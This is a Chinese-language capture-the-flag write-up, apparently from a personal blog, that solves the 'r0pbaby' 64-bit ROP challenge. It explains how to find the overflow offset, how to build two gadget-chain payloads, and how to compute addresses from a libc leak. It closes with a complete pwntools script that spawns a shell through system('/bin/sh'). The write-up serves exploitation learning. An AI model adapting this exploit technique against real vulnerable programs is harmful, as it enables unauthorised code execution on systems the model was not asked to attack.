經典的rop利用題目
作為一枚菜雞,希望能從基礎開始多學點東西
首先file指令檢視檔案類型為64位程式
image.png
用checksec檢視開啟的保護,可以看到,開啟了堆棧不可執行、位址分布随機化
執行程式,有以下這些選項
選項1給出libc的位址
選項2給出libc其中一個函數的位址
選項3可以向棧中輸入小于1024的任意資料
首先測試溢出點
通過peda自帶的pattern_create和pattern_offset進行溢出填充位數判斷
可以得到溢出填充位為8位元組,之後緊接着就是ret的位址,可以進行覆寫
在這裡一般思路就是覆寫為system或者其他可以執行系統指令的函數位址,使得可以getshell
需要注意的是,64位系統中通過寄存器傳參,函數傳參順序是RDI,RSI,RDX,RCX,R8,R9
調用system等函數時需要先給RDI寄存器指派參數内容'/bin/sh'
使得最後執行system('/bin/sh'),是以需要構造棧布局
這裡有兩種ROP的利用方法
0x01
首先是考慮先指派RDI内容為'/bin/sh',之後再調用system函數
是以在這裡需要找到gaget
這樣我們的payload如下所示:
payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
ret到
pop rid ; ret
的位址進行執行,将棧中sh_addr('/bin/sh'的位址)傳到RDI寄存器,接着ret到system_addr(sysem函數的位址)執行shell
0x02
還可以通過找到先pop寄存器,然後直接call寄存器的gaget來利用
這樣的利用棧布局就如下payload所示
payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr)
pop rax ; pop rdi ; call rax
,将棧中system_addr傳到RAX寄存器,将sh_addr傳到RDI寄存器,之後直接CALL RAX來執行shell
payload和棧布局找好了,接下來就是寫腳本利用了
還需要得到system在libc中的位址和'/bin/sh'字元串的位址
而'/bin/sh'在libc中已經存在了,可以通過Winhex查找,也可以通過IDA查找,這裡注意,找到的是offset address
在IDA中按shift+f12,再通過ctrl+f搜尋也可以找到
system的記憶體加載位址可以通過程式的選項2直接擷取,再通過system在libc中固定的偏移位址,就可以得到libc的實際加載位址,并且能夠獲得其他所有函數和'/bin/sh'的實際加載位址。可以使用pwntools工具來擷取offset address
from pwn import *
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
system_offset = libc.symbols['system']
p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")
system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)
拿到system的實際位址和偏移位址offset addr之後,就可以拿到'/bin/sh'的實際位址
sh_addr = system_addr + sh_offset - system_offset
最後system和'/bin/sh'的位址都拿到,兩種payload都可以生效
from pwn import *
p = process("./r0pbaby")
elf = ELF("r0pbaby")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
system_offset = libc.symbols['system']
sh_offset = 0x179ef5
bss_addr = elf.bss()
pop_rdi_ret_offset = 0x00000000000208ef
ppc_addr_offset = 0x00000000000f53eb
p.recvuntil(": ")
p.sendline("1")
libc_addr = p.recvline().split(": ")[1].strip("\n")
libc_addr = long(libc_addr,16)
print "libc_addr:%x" % libc_addr
p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")
system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)
sh_addr = system_addr + sh_offset - system_offset
pop_rdi_ret = system_addr + pop_rdi_ret_offset - system_offset
ppc_addr = system_addr + ppc_addr_offset - system_offset
print "system_addr:%x" % system_addr
print "base_addr:%x" % (system_addr - system_offset)
p.recvuntil(": ")
p.sendline("3")
p.recvuntil(": ")
#payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr)
payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
length = str(len(payload))
print length
print payload
p.sendline(length)
p.sendline(payload)
p.recv()
p.interactive()
ps:
一開始寫腳本直接用選項1的位址做libc基位址來加上偏移,發現怎麼都是錯的
選項1給出的位址不是libc的基位址,需要用選項2的函數位址洩露來算出libc的基位址